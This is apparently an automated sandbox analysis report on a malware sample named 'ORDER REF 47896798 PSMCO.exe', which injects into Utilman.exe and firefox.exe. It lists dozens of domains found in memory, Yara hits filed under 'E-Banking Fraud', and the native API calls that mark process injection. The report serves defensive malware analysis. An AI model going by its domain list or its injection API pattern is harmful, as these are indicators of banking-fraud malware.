                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lamachine.net
                      Source: firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.larep.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.liansezhibo.com
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianyizhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.liehuzhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lihuazhibo.net
                      Source: firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.liuhuazhibo.com
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.liuhuazhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.longlash.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.losbravos.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.maituzhibo.com
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.manchengzhibo.com
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.masterfloors.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.meiyingxiazai.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mengyouzhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.microprinting.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.minizhibo.com
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.momozhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mozizhibo.com
                      Source: firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.naixizhibo.com
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.naturalelement.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.netdate.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.niled.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nkdc.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nvdizhibo.com
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ourdeal.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.parentwise.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.pasiones.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.pessoas.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.qingbaozhibo.net/binding
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.qinglaizhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.qualityoffice.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.quyaozhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.salesa.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.salmagundi.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.shareyourlove.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.shenqizhibo.net/binding
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.simplystudy.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.smartdna.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.socialanimal.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.souyouzhibo.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sportsquest.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.taffix.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.weddingangel.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.whatsforlunch.net
                      Source: Utilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.womenstrikeus.net

                      E-Banking Fraud

                      Source: Yara match, File source: 5.2.ORDER REF 47896798 PSMCO.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.2.ORDER REF 47896798 PSMCO.exe.400000.0.raw.unpack, type: UNPACKEDPE

                      System Summary

                      Source: initial sample, Static PE information: Filename: ORDER REF 47896798 PSMCO.exe
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0042CCC3 NtClose,5_2_0042CCC3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942B60 NtClose,LdrInitializeThunk,5_2_01942B60
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01942DF0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01942C70
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019435C0 NtCreateMutant,LdrInitializeThunk,5_2_019435C0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01944340 NtSetContextThread,5_2_01944340
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01944650 NtSuspendThread,5_2_01944650
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942B80 NtQueryInformationFile,5_2_01942B80
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942BA0 NtEnumerateValueKey,5_2_01942BA0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942BF0 NtAllocateVirtualMemory,5_2_01942BF0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942BE0 NtQueryValueKey,5_2_01942BE0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942AB0 NtWaitForSingleObject,5_2_01942AB0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942AD0 NtReadFile,5_2_01942AD0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942AF0 NtWriteFile,5_2_01942AF0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942DB0 NtEnumerateKey,5_2_01942DB0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942DD0 NtDelayExecution,5_2_01942DD0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942D10 NtMapViewOfSection,5_2_01942D10
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942D00 NtSetInformationFile,5_2_01942D00
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942D30 NtUnmapViewOfSection,5_2_01942D30
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942CA0 NtQueryInformationToken,5_2_01942CA0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942CC0 NtQueryVirtualMemory,5_2_01942CC0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942CF0 NtOpenProcess,5_2_01942CF0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942C00 NtQueryInformationProcess,5_2_01942C00
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942C60 NtCreateKey,5_2_01942C60
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942F90 NtProtectVirtualMemory,5_2_01942F90
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942FB0 NtResumeThread,5_2_01942FB0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942FA0 NtQuerySection,5_2_01942FA0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942FE0 NtCreateFile,5_2_01942FE0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942F30 NtCreateSection,5_2_01942F30
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942F60 NtCreateProcessEx,5_2_01942F60
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942E80 NtReadVirtualMemory,5_2_01942E80
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942EA0 NtAdjustPrivilegesToken,5_2_01942EA0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942EE0 NtQueueApcThread,5_2_01942EE0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942E30 NtWriteVirtualMemory,5_2_01942E30
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01943090 NtSetValueKey,5_2_01943090
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01943010 NtOpenDirectoryObject,5_2_01943010
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019439B0 NtGetContextThread,5_2_019439B0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01943D10 NtOpenProcessToken,5_2_01943D10
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01943D70 NtOpenThread,5_2_01943D70
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05124650 NtSuspendThread,LdrInitializeThunk,7_2_05124650
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05124340 NtSetContextThread,LdrInitializeThunk,7_2_05124340
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122D10 NtMapViewOfSection,LdrInitializeThunk,7_2_05122D10
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_05122D30
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122DD0 NtDelayExecution,LdrInitializeThunk,7_2_05122DD0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_05122DF0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_05122C70
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122C60 NtCreateKey,LdrInitializeThunk,7_2_05122C60
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_05122CA0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122F30 NtCreateSection,LdrInitializeThunk,7_2_05122F30
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122FB0 NtResumeThread,LdrInitializeThunk,7_2_05122FB0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122FE0 NtCreateFile,LdrInitializeThunk,7_2_05122FE0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_05122E80
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122EE0 NtQueueApcThread,LdrInitializeThunk,7_2_05122EE0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05122B60 NtClose,LdrInitializeThunk,7_2_05122B60
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_05122BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_05122BA0
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_05122BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_05122BF0
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_05122BE0 NtQueryValueKey,LdrInitializeThunk,7_2_05122BE0
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_05122AD0 NtReadFile,LdrInitializeThunk,7_2_05122AD0
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_05122AF0 NtWriteFile,LdrInitializeThunk,7_2_05122AF0
